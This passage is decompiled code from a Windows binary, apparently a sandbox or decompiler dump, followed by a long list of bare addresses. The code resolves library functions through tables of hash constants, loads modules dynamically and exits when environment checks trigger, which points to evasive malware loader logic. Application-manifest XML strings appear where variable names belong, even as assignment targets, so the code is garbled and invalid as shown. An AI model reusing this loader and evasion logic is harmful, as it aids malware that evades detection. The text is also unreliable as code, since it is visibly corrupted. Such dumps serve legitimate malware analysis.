									_t543 = M6ECB04CC; // 0xcb2da8
									_t407 = GetPrivateProfileIntA(_t502,  &_v972, 0, _t543);
									_t544 = M6ECB0524; // 0xcd1c70
									M6ECB04BC = _t407;
									"embly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = GetModuleHandleA(_t544);
									_t410 = GetModuleHandleA(E6ECA1D50(0x77146c, _t592));
									_push(0x435a88);
									_t597 = _t410;
									_push(1);
									_push( &_v968);
									_push(_t597);
									_v968 = 0x3f82e705;
									_v964 = 0;
									_v960 = 0;
									_v956 = 0;
									E6ECA1DB0();
									_t413 = _v956;
									_t612 = _t609 + 0x2c;
									if(_t413 != 0) {
										M6ECB058C = _t413;
									}
									_t415 = E6ECAA2F0(E6ECA1D50(0x77d760, _t592), 0, 0);
									_t503 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
									_t580 = _t415;
									wsprintfA( &_v576, "%s%s", _t503, _t580);
									_t613 = _t612 + 0x24;
									HeapFree(GetProcessHeap(), 0, _t580);
									_t419 =  &_v568;
									_push(_t419);
									M6ECB058C();
									M6ECB04A8 = _t419;
									if(E6ECAB4C0() != 0) {
										ExitProcess(0);
									}
									_push(8);
									_push( &_v856);
									M6ECB0614 = 1;
									L6ECAC2EE();
									_v864 = 8;
									_v876 = 0;
									if(NtQuerySystemInformation(0x67,  &_v864, 8,  &_v876) < 0 || _v892 != 8 || (_v876 & 0x00000002) == 0) {
										_t582 = 0;
									} else {
										_t582 = 1;
										_v996 = 1;
									}
									if(_t597 != 0) {
										_push(0x435a88);
										_push(1);
										_push( &_v988);
										_push(_t597);
										_v988 = 0x2e136e83;
										_v984 = 0;
										_v980 = 0;
										_v976 = 0;
										E6ECA1DB0();
										_t461 = _v976;
										_t623 = _t613 + 0x10;
										if(_t461 != 0) {
											"Level>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t461;
										}
										_t96 = _t582 + 0x435a88; // 0x435a88
										_v988 = 0xa1acb3a1;
										_v984 = E6ECA7C40;
										_v980 =  &M6ECB05A4;
										_v976 = 0;
										_v972 = 0xd9ef7edb;
										_v968 = E6ECA78B0;
										_v964 =  &M6ECB0594;
										_v960 = 0;
										_v956 = 0x75da5974;
										_v952 = E6ECA7C20;
										_v948 =  &M6ECB05A0;
										_v944 = 0;
										_v940 = 0x2a081f08;
										_v936 = E6ECA8230;
										_v932 =  &M6ECB05F8;
										_v928 = 0;
										_v924 = 0x71e40fdf;
										_v920 = E6ECA82C0;
										_v916 =  &M6ECB05FC;
										_v912 = 0;
										E6ECA1FA0(_t597,  &_v988, 5, _t96);
										_t613 = _t623 + 0x10;
									}
									_t423 = E6ECA1D50(0x771704, _t592);
									_t505 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
									wsprintfA( &_v596, "%s%s", _t505, _t423);
									_t614 = _t613 + 0x18;
									_t425 =  &_v588;
									_push(_t425);
									M6ECB058C();
									M6ECB0490 = _t425;
									if(_t425 != 0) {
										_v864 = 0x1ee4afd;
										_v860 = E6ECA7F10;
										_v856 =  &M6ECB05E8;
										_v852 = 0;
										_v848 = 0xcd967670;
										_v844 = E6ECA80B0;
										_v840 =  &M6ECB05EC;
										_v836 = 0;
										_v832 = 0xc640750c;
										_v828 = E6ECA8100;
										_v824 =  &M6ECB05F0;
										_v820 = 0;
										_v816 = 0x856c5686;
										_v812 = E6ECA7E20;
										_v808 =  &M6ECB05C0;
										_v804 = 0;
										_v800 = 0xd576e7bf;
										_v796 = E6ECA7E50;
										_v792 =  &M6ECB05C4;
										_v788 = 0;
										_v784 = 0x4bdf2df3;
										_v780 = E6ECA7EC0;
										_v776 =  &M6ECB05B8;
										_v772 = 0;
										_v768 = 0x25955ea4;
										_v764 = E6ECA7EE0;
										_v760 =  &M6ECB05E0;
										_v756 = 0;
										_v752 = 0x576e0706;
										_v748 = E6ECA7E00;
										_v744 =  &M6ECB05B0;
										_v740 = 0;
										_v736 = 0xa3bab257;
										_v732 = E6ECA7E00;
										_v728 =  &M6ECB05B4;
										_v724 = 0;
										_v720 = 0xeb950520;
										_v716 = E6ECA7EF0;
										_v712 =  &M6ECB05E4;
										_v708 = 0;
										_v704 = 0x983d21d0;
										_v700 = E6ECA7E90;
										_v696 =  &M6ECB05C8;
										_v692 = 0;
										_v688 = 0xbd4f6953;
										_v684 = E6ECA7EA0;
										_v680 =  &M6ECB05CC;
										_v676 = 0;
										_v672 = 0xc1059600;
										_v668 = E6ECA7EF0;
										_v664 =  &M6ECB05BC;
										_v660 = 0;
										_v656 = 0x92d6cfa1;
										_v652 = E6ECA7EB0;
										_v648 =  &M6ECB05D0;
										_v644 = 0;
										_v640 = 0xa710b547;
										_v636 = E6ECA7EF0;
										_v632 =  &M6ECB05D4;
										_v628 = 0;
										_v624 = 0x35fe64ad;
										_v620 = E6ECA7DB0;
										_v616 =  &M6ECB05A8;
										_v612 = 0;
										_v608 = 0x508fafbc;
										_v604 = E6ECA7DE0;
										_v600 =  &M6ECB05AC;
										_v596 = 0;
										E6ECA1FA0(_t425,  &_v864, 0x11, _t582 + 0x435a88);
										_t559 = M6ECB0578; // 0x0
										_v984 =  *((char*)(_t559 + 9));
										_t456 = M6ECB0568; // 0x0
										_t614 = _t614 + 0x10;
										_v982 =  *(_t456 + 0x1e) & 0x0000ffff;
										_t457 = M6ECB0574; // 0x0
										_v980 =  *(_t456 + 0x1e) & 0x0000ffff;
										_v978 =  *((char*)(_t457 + 1));
										_v974 = 0x62;
										_v976 =  *_t457;
										_push(0);
										_push( &_v984);
										_v972 =  *((char*)(_t457 + 3));
										_v970 = 0;
										M6ECB05A8();
										_push(0);
										_t459 =  &_v992;
										_push(_t459);
										_v980 = 0;
										M6ECB05A8();
										_t582 = 0 + _t459;
										_v1008 = _t582;
									}
									_t426 = E6ECA1D50(0x770adc, _t592);
									_t506 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
									wsprintfA( &_v592, "%s%s", _t506, _t426);
									_t615 = _t614 + 0x18;
									_t428 =  &_v584;
									_push(_t428);
									M6ECB058C();
									M6ECB0494 = _t428;
									if(_t428 != 0) {
										_t208 = _t582 + 0x435a88; // 0x435a88
										_v980 = 0x1febfb51;
										_v976 = E6ECA7ED0;
										_v972 =  &M6ECB05DC;
										_v968 = 0;
										_v964 = 0xa4bc5079;
										_v960 = E6ECA7EC0;
										_v956 =  &M6ECB05D8;
										_v952 = 0;
										_v948 = 0x3fca0603;
										_v944 = E6ECA83A0;
										_v940 =  &M6ECB0608;
										_v936 = 0;
										_v932 = 0x5fa6686b;
										_v928 = E6ECA83D0;
										_v924 =  &M6ECB060C;
										_v920 = 0;
										E6ECA1FA0(_t428,  &_v980, 4, _t208);
										_t615 = _t615 + 0x10;
									}
									_t429 = E6ECA1D50(0x7715e4, _t592);
									_t430 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
									_t431 = wsprintfA( &_v588, "%s%s", _t430, _t429);
									_t616 = _t615 + 0x18;
									_push( &_v580);
									M6ECB058C();
									M6ECB0498 = _t431;
									if(_t431 != 0) {
										_t228 = _t582 + 0x435a88; // 0x435a88
										_v976 = 0xa0428c41;
										_v972 = E6ECA7B70;
										_v968 =  &M6ECB0598;
										_v964 = 0;
										_v960 = 0x35ad950a;
										_v956 = E6ECA7BD0;
										_v952 =  &M6ECB059C;
										_v948 = 0;
										E6ECA1FA0(_t431,  &_v976, 2, _t228);
										_t616 = _t616 + 0x10;
									}
									_t432 = E6ECA1D50(0x350b4, _t592);
									_t433 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
									_t434 = wsprintfA( &_v584, "%s%s", _t433, _t432);
									_t617 = _t616 + 0x18;
									_push( &_v576);
									M6ECB058C();
									M6ECB049C = _t434;
									if(_t434 != 0) {
										_v972 = 0x32e7e368;
										_v968 = E6ECA82F0;
										_v964 =  &M6ECB0600;
										_v960 = 0;
										E6ECA1FA0(_t434,  &_v972, 1, _t582 + 0x435a88);
										_t617 = _t617 + 0x10;
									}
									_t436 = E6ECAA2F0(E6ECA1D50(0x77cf0c, _t592), 0, 0);
									_t551 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
									_t583 = _t436;
									wsprintfA( &_v580, "%s%s", _t551, _t583);
									_t618 = _t617 + 0x24;
									_t440 = HeapFree(GetProcessHeap(), 0, _t583);
									_push( &_v572);
									M6ECB058C();
									M6ECB04A0 = _t440;
									if(_t440 != 0) {
										_v968 = 0xa4a1b443;
										_v964 = E6ECA7EE0;
										_v960 =  &M6ECB05F4;
										_v956 = 0;
										E6ECA1FA0(_t440,  &_v968, 1, _v976 + 0x435a88);
										_t618 = _t618 + 0x10;
									}
									_t441 = E6ECA1D50(0x37b4c, _t592);
									_t552 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
									_t443 = wsprintfA( &_v576, "%s%s", _t552, _t441);
									_t619 = _t618 + 0x18;
									_push( &_v568);
									M6ECB058C();
									M6ECB04A4 = _t443;
									if(_t443 != 0) {
										_v964 = 0x468fa9db;
										_v960 = E6ECA8370;
										_v956 =  &M6ECB0604;
										_v952 = 0;
										E6ECA1FA0(_t443,  &_v964, 1, _v972 + 0x435a88);
										_t619 = _t619 + 0x10;
									}
									_t444 = E6ECA31F0(0xffffffff);
									_push(0xa);
									_push(0x10);
									_push(L"15.0.");
									M6ECB04EC = _t444;
									_push(E6ECA1D50(0x1f3ac, _t592));
									E6ECA8400();
									if(E6ECAB820(0) != 0) {
										ExitProcess(0);
									}
									M6ECB0614 = 2;
									return 1;
								} else {
									goto L131;
								}
							}
						}
					}
				}
			}

0x6eca851e
0x6eca8522
0x6eca94d7
0x6eca94e8
0x6eca94ea
0x6eca94f1
0x6eca94f1
0x6eca94f3
0x6eca94f8
0x6eca94fa
0x6eca9501
0x6eca9501
0x6eca9503
0x6eca9508
0x6eca950a
0x6eca9511
0x6eca9511
0x6eca9513
0x6eca9518
0x6eca951a
0x6eca9521
0x6eca9521
0x6eca9523
0x6eca9528
0x6eca952a
0x6eca9531
0x6eca9531
0x6eca9533
0x6eca9538
0x6eca953a
0x6eca9541
0x6eca9541
0x6eca9543
0x6eca9548
0x6eca954a
0x6eca9551
0x6eca9551
0x6eca9553
0x6eca9558
0x6eca955a
0x6eca9561
0x6eca9561
0x6eca9563
0x6eca9568
0x6eca956a
0x6eca9571
0x6eca9571
0x6eca9573
0x6eca9578
0x6eca957a
0x6eca9581
0x6eca9581
0x6eca9583
0x6eca9588
0x6eca958a
0x6eca9591
0x6eca9591
0x6eca9593
0x6eca9598
0x6eca959a
0x6eca95a1
0x6eca95a1
0x6eca95a3
0x6eca95a8
0x6eca95aa
0x6eca95b1
0x6eca95b1
0x6eca95b3
0x6eca95b9
0x6eca95bf
0x6eca95ca
0x6eca95cc
0x6eca95cf
0x6eca95cf
0x6eca95d1
0x6eca95d6
0x6eca95d8
0x6eca95db
0x6eca95db
0x6eca95dd
0x6eca95e2
0x6eca95e4
0x6eca95e7
0x6eca95e7
0x6eca95e9
0x6eca95ee
0x6eca95f0
0x6eca95f3
0x6eca95f3
0x6eca95f5
0x6eca95fa
0x6eca95fc
0x6eca95ff
0x6eca95ff
0x6eca9601
0x6eca9606
0x6eca9608
0x6eca960b
0x6eca960b
0x6eca960d
0x6eca9612
0x6eca9614
0x6eca9617
0x6eca9617
0x6eca9619
0x6eca961e
0x6eca9620
0x6eca9627
0x6eca9627
0x6eca9629
0x6eca962e
0x6eca9630
0x6eca9637
0x6eca9637
0x6eca9639
0x6eca963e
0x6eca9640
0x6eca9647
0x6eca9647
0x6eca9649
0x6eca964e
0x6eca9650
0x6eca9657
0x6eca9657
0x6eca9659
0x6eca965e
0x6eca9660
0x6eca9663
0x6eca9663
0x6eca9669
0x6eca9670
0x6eca9673
0x6eca9673
0x6eca9678
0x6eca967e
0x6eca9680
0x6eca9680
0x6eca968b
0x6eca9690
0x6eca9690
0x6eca9692
0x6eca9694
0x6eca9697
0x6eca9697
0x6eca9699
0x6eca969c
0x6eca969c
0x6eca96a4
0x6eca96a9
0x6eca96ab
0x6eca96af
0x6eca96b4
0x6eca96bb
0x6eca96bb
0x6eca96ab
0x00000000
0x6eca8528
0x6eca8529
0x6eca96c0
0x6eca96cc
0x6eca852f
0x6eca8537
0x6eca8551
0x6eca8556
0x6eca8563
0x6eca856b
0x6eca8578
0x6eca857b
0x6eca857b
0x6eca8581
0x6eca858e
0x6eca859a
0x6eca85aa
0x6eca85bc
0x6eca85c4
0x6eca85c6
0x6eca85d5
0x6eca85da
0x6eca85df
0x6eca85f6
0x6eca85fb
0x6eca8608
0x6eca8610
0x6eca861f
0x6eca8624
0x6eca8632
0x6eca8637
0x6eca863f
0x6eca864d
0x6eca8669
0x6eca8671
0x6eca8679
0x6eca8680
0x6eca8684
0x6eca8690
0x6eca869b
0x6eca86a0
0x6eca86a3
0x6eca86a3
0x6eca86c8
0x6eca86d0
0x6eca86d4
0x6eca86da
0x6eca86e5
0x6eca86ea
0x6eca870f
0x6eca8716
0x6eca871b
0x6eca8721
0x6eca8731
0x6eca8752
0x6eca875d
0x6eca8768
0x6eca8772
0x6eca8779
0x6eca877e
0x6eca8784
0x6eca8794
0x00000000
0x6eca8796
0x6eca8797
0x6eca8797
0x6eca8794
0x6eca8731
0x6eca86ea
0x6eca879d
0x6eca87a7
0x6eca87b0
0x6eca87b5
0x6eca87bb
0x6eca87c2
0x6eca87ce
0x6eca87d3
0x6eca87da
0x6eca87ec
0x6eca87f1
0x6eca87fb
0x6eca8805
0x6eca8811
0x6eca8816
0x6eca881b
0x6eca881e
0x6eca8823
0x6eca8829
0x6eca882e
0x6eca883b
0x00000000
0x6eca8841
0x6eca8844
0x6eca884c
0x00000000
0x6eca8852
0x6eca885f
0x6eca8866
0x6eca886a
0x6eca8878
0x6eca887a
0x6eca8881
0x6eca888c
0x6eca8894
0x6eca8896
0x6eca889d
0x6eca889d
0x6eca8894
0x6eca88a7
0x6eca88b5
0x6eca88b7
0x6eca88be
0x6eca88cb
0x6eca88d3
0x6eca88d8
0x6eca88dc
0x6eca88df
0x6eca88df
0x6eca88d8
0x6eca88e4
0x6eca88ec
0x6eca88f6
0x6eca88fb
0x6eca8900
0x6eca8900
0x6eca8905
0x6eca890a
0x6eca890f
0x6eca8912
0x6eca8912
0x6eca8921
0x6eca8923
0x6eca892a
0x6eca8943
0x6eca8949
0x6eca8952
0x6eca8957
0x6eca895a
0x6eca895a
0x6eca896a
0x6eca897a
0x6eca897f
0x6eca8994
0x6eca8999
0x6eca89a4
0x6eca89a9
0x6eca89b9
0x6eca89c9
0x6eca89d9
0x6eca89e9
0x6eca89f9
0x6eca8a09
0x6eca8a1c
0x6eca8a2c
0x6eca8a3c
0x6eca8a4c
0x6eca8a5c
0x6eca8a6c
0x6eca8a7c
0x6eca8a89
0x6eca8a92
0x6eca8aa3
0x6eca8ab3
0x6eca8acb
0x6eca8ae3
0x6eca8af3
0x6eca8b0b
0x6eca8b10
0x6eca8b16
0x6eca8b1c
0x6eca8b28
0x6eca8b2a
0x6eca8b2f
0x6eca8b39
0x6eca8b3f
0x6eca8b46
0x6eca8b48
0x6eca8b50
0x6eca8b55
0x6eca8b7c
0x6eca8b7c
0x6eca8b80
0x6eca8b82
0x6eca8b85
0x6eca8b98
0x6eca8b98
0x6eca8b9b
0x6eca8b9d
0x6eca8ba0
0x6eca8ba2
0x6eca8ba2
0x6eca8ba0
0x6eca8b87
0x6eca8b87
0x6eca8b8a
0x00000000
0x6eca8b8c
0x6eca8b8c
0x6eca8b8c
0x6eca8b8a
0x6eca8b57
0x6eca8b57
0x6eca8b5e
0x00000000
0x6eca8b65
0x6eca8b65
0x6eca8b69
0x6eca8b6b
0x6eca8b71
0x6eca8b75
0x6eca8b75
0x6eca8b5e
0x6eca8bac
0x6eca8bad
0x6eca8b50
0x6eca8bb2
0x6eca8bb2
0x6eca8bb8
0x6eca8bba
0x6eca8bbf
0x6eca8bcd
0x6eca8bd2
0x6eca8bd7
0x6eca8bdd
0x6eca8be6
0x6eca8bf4
0x6eca8c01
0x6eca8c08
0x6eca8c0c
0x6eca8c12
0x6eca8c1c
0x6eca8c22
0x6eca8c2f
0x6eca8c3c
0x6eca8c4a
0x6eca8c4c
0x6eca8c51
0x6eca8c53
0x6eca8c59
0x6eca8c5a
0x6eca8c5b
0x6eca8c63
0x6eca8c67
0x6eca8c6b
0x6eca8c6f
0x6eca8c74
0x6eca8c78
0x6eca8c7d
0x6eca8c7f
0x6eca8c7f
0x6eca8c92
0x6eca8c97
0x6eca8c9d
0x6eca8cae
0x6eca8cb4
0x6eca8cc0
0x6eca8cc6
0x6eca8ccd
0x6eca8cce
0x6eca8cd4
0x6eca8ce0
0x6eca8ce3
0x6eca8ce3
0x6eca8cee
0x6eca8cf6
0x6eca8cf7
0x6eca8d01
0x6eca8d19
0x6eca8d20
0x6eca8d2e
0x6eca8d4e
0x6eca8d43
0x6eca8d43
0x6eca8d48
0x6eca8d48
0x6eca8d52
0x6eca8d58
0x6eca8d5d
0x6eca8d63
0x6eca8d64
0x6eca8d65
0x6eca8d6d
0x6eca8d71
0x6eca8d75
0x6eca8d79
0x6eca8d7e
0x6eca8d82
0x6eca8d87
0x6eca8d89
0x6eca8d89
0x6eca8d8e
0x6eca8d9d
0x6eca8da5
0x6eca8dad
0x6eca8db5
0x6eca8db9
0x6eca8dc1
0x6eca8dc9
0x6eca8dd1
0x6eca8dd5
0x6eca8ddd
0x6eca8de5
0x6eca8ded
0x6eca8df1
0x6eca8df9
0x6eca8e01
0x6eca8e09
0x6eca8e0d
0x6eca8e15
0x6eca8e1d
0x6eca8e25
0x6eca8e29
0x6eca8e2e
0x6eca8e2e
0x6eca8e37
0x6eca8e3c
0x6eca8e57
0x6eca8e59
0x6eca8e5c
0x6eca8e63
0x6eca8e64
0x6eca8e6a
0x6eca8e71
0x6eca8e89
0x6eca8e94
0x6eca8e9f
0x6eca8eaa
0x6eca8eb1
0x6eca8ebc
0x6eca8ec7
0x6eca8ed2
0x6eca8ed9
0x6eca8ee4
0x6eca8eef
0x6eca8efa
0x6eca8f01
0x6eca8f0c
0x6eca8f17
0x6eca8f22
0x6eca8f29
0x6eca8f34
0x6eca8f3f
0x6eca8f4a
0x6eca8f51
0x6eca8f5c
0x6eca8f67
0x6eca8f72
0x6eca8f79
0x6eca8f84
0x6eca8f8f
0x6eca8f9a
